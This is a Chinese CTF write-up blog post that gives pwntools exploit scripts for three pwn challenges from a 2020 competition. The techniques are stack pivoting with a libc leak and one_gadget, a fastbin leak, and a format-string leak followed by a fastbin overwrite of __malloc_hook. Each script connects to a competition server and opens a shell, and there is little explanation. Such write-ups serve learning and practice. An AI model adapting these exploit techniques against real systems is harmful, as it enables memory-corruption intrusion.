新春戰疫公益賽(二)pwn

原創 doudoudedi 2020-02-25 00:51

第一天和第三天直接被爆錘
自己已經盡力了
武漢加油!!!

borrowstack

就是基本的棧遷移
exp:

from pwn import *
from LibcSearcher import *
#p=process('./borrowstack')
p=remote('123.56.85.29',3635)
elf=ELF('./borrowstack')
libc=elf.libc
bss=0x000601080
pop_rdi=0x0400702+1
main=0x400626
p.recvuntil('want')

payload='a'*0x58+p64(elf.got['__libc_start_main'])+p64(bss+0x50)+p64(0x00400699)
p.send(payload)
p.recvuntil('!')
bsspayload='\x00'*0x50+p64(bss+0)+p64(pop_rdi)+p64(elf.got['read'])+p64(0x040065B)
p.send(bsspayload)
read=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

libcbase=read-libc.sym['read']
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
log.success('libcbase: '+hex(libcbase))
one_gadget=libcbase+o_g[2]
system=libcbase+libc.sym['system']
bin_sh=libcbase+libc.search('/bin/sh').next()
sleep(0.2)
payload=p64(one_gadget)*2
p.send(payload)
p.recvuntil('!')
#p.recvuntil(':')
#p.send('icqa553481f05a84e6e69ac62bd46aef')
p.interactive()

excited

通過fastbin 的先進後出的性質泄露flag

from pwn import *
p=remote('123.56.85.29',6484)
#p=process('./excited')
elf=ELF('./excited')
libc=elf.libc
def add(size1,ba,size2,na):
	p.sendlineafter(' :','1')
	p.sendlineafter(' : ',str(size1))
	p.sendafter('ba : ',ba)
	p.sendlineafter(' : ',str(size2))
	p.sendafter('na : ',na)

def  delete(idx):
	p.sendlineafter(' :','3')
	p.sendlineafter(' : ',str(idx))

def show(idx):
	p.sendlineafter(' :','4')
	p.sendlineafter(' : ',str(idx))

add(0x10,'aaaa',0x10,'cccc')
add(0x10,'\x11'*4,0x20,'dddd')
#add(0x68)
delete(1)
delete(0)
add(0x20,'\x12'*4,0x20,'dddd')
add(0x10,'\x12'*4,0x10,p64(0x06020A8)*2)
show(1)
p.interactive()

interested

先格式化字符串泄露然後fastbin attack 打malloc_hook
exp:

from pwn import *
#p=process('./interested')
p=remote('123.56.85.29',3041)
elf=ELF('./interested')
libc=elf.libc
def check():
	p.sendlineafter(' :','0')

def add(size1,ost,size2,rst):
	p.sendlineafter(' :','1')
	p.sendlineafter(' : ',str(size1))
	p.sendlineafter(' : ',ost)
	p.sendlineafter(' : ',str(size2))
	p.sendlineafter(' : ',rst)

def edit(idx,ost,rst):
	p.sendlineafter(' :','2')
	p.sendlineafter(' : ',str(idx))
	p.sendlineafter(' : ',ost)
	p.sendlineafter(' : ',rst)

def delete(idx):
	p.sendlineafter(' :','3')
	p.sendlineafter(' : ',str(idx))

def show(idx):
	p.sendlineafter(' :','4')
	p.sendlineafter(' : ',str(idx))


p.recvuntil(':')
p.send('OreOOrereOOreO%17$p')
check()
p.recvuntil('OreOOrereOOreO')
libcbase=int(p.recv(14),16)-240-libc.sym['__libc_start_main']
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+o_g[3]
log.success('libcbase: '+hex(libcbase))
add(0x20,'\x11',0x30,'\x22')
add(0x68,'\x12',0x20,'\x21')
delete(2)
edit(2,p64(malloc_hook-0x23),p64(malloc_hook-0x23))
add(0x68,'doudou',0x68,'a'*19+p64(one_gadget))
p.sendlineafter(' :','1')
p.sendlineafter(' : ',str(1))
p.interactive()
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

linux pwn練習0x01

文章目錄doubly_dangerousWarmUp關於確定溢出點的一種方法:gdb-peda關於利用ret調用shellcode函數調用方式的基本介紹pwn1just_do_it 題目 doubly_dangerous 內

yusakul 2020-07-07 13:34:36

linux pwn練習0x02

文章目錄tyro_shellcode tyro_shellcode OpenCTF : tyro_shellcode Baby’s first shellcode problem. Server: 172.31.1.43:161

yusakul 2020-07-07 13:34:36

[題]爆棧

1

大猫会长 2020-07-07 05:31:12

[題]對Null和undefined使用展開運算符

1 2  

大猫会长 2020-07-07 05:31:12

Scrambled Polygon(凸包+極角排序)

題目鏈接:Scrambled Polygon 先給出知識點的講解鏈接:傳送門 極角就是高中學的,極座標系中的極角。 sort對結構體排序,不都有一個cmp的函數嗎?就是這個函數。 我們都會按照一個參數來改,這回我們就按照極角來

反向爆零直至AK 2020-07-07 03:58:56

Need for Speed(二分)

題目鏈接:Need for Speed Sheila is a student and she drives a typical student car: it is old, slow, rusty, and falling a

反向爆零直至AK 2020-07-07 03:58:56

XCTF進階區Crypto之flag_in_your_hand write up

下載下來查看html源碼和js源碼: <html> <head> <title>Flag in your Hand</title> <style type="text/css"> body { padding-

KogRow 2020-07-07 15:59:18

docker搭建pwn環境

文章目錄拉取ubuntu鏡像運行容器安裝環境修改apt源修改pip源安裝pwntools安裝pwndbg安裝ROPgadget、libc-database、one_gadget安裝tmux與主機拷貝文件保存容器爲新鏡像示例補充添加

yusakul 2020-07-07 13:34:36

HITCON-Training lab5(自己構造rop)

看到靜態鏈接,一頓欣喜,直接ropchain生成,棧溢出找出來就ok啦?然後後來發現並沒有那麼簡單。。。 =================================================================

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab7(一道簡單的格式化字符串讀漏洞)

格式化字符串知道他的操作,可是做的一點也不熟練吧,,,BJDCTF上的r2t4不會啊,,,看不懂,,,所以就來補補格式化字符串的題目了,,,,   看到canary開啓了,我還以爲要泄漏canary呢,結果發現不用那麼麻煩,,, 其實

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab8(格式化字符串寫漏洞)

還在補格式化字符串漏洞的知識,,,,看到這道題的時候,有點懵,,,因爲發現218不會整,,,看官方writeup也不太行,,,   先知社區上有篇講的就很好了,,,nice,用了四種方法(最後一種沒看懂,,,),,,看完,BJDCTF那道

言承Yolanda 2020-07-08 01:37:40

BJDCTF 2nd - Pwn(r2t3、one_gadget、r2t4)

r2t3 最簡單的一道題,可是我竟然沒有做出來,無語了,,, 文件保護沒啥好說的,,,很正常 進入name_check函數 255 ==> 255 256 ==> 0,257 ==> 1,258 ==> 2,259 ==> 3, 2

言承Yolanda 2020-07-08 01:37:40

棧遷移學習(buuctf [Black Watch 入羣題])

i春秋的borrowstack是棧遷移和萬能gadget的混合,,,然後writeup看的不是很明白,也沒有很細的解析,所以,emmm,應該是自己棧遷移學的不是很好,只是知道大概的意思,但是還沒有做過題,這次在看雪看到文章,就好好學一下,

言承Yolanda 2020-07-08 01:37:40

BUUCTF刷題(前12道)

哈哈哈,我又來刷題了,看了下BUUCTF上面的pwn題還真多。。。 test_your_nc ida查看,發現直接執行system,所以,直接交互就可以 //寫下簡單的腳本 from pwn import * p = remote('

言承Yolanda 2020-07-08 01:37:40

逆向入門筆記之分析TraceMe.exe

TraceMe.exe是一個示例程序,用於逆向的學習,簡單地模擬了註冊機制。 我們把它拖進IDA中無腦F5一波: 雙擊DialogFunc進入這個函數: BOOL __stdcall DialogFunc(HWND hWnd, UIN

KogRow 2020-07-07 15:59:23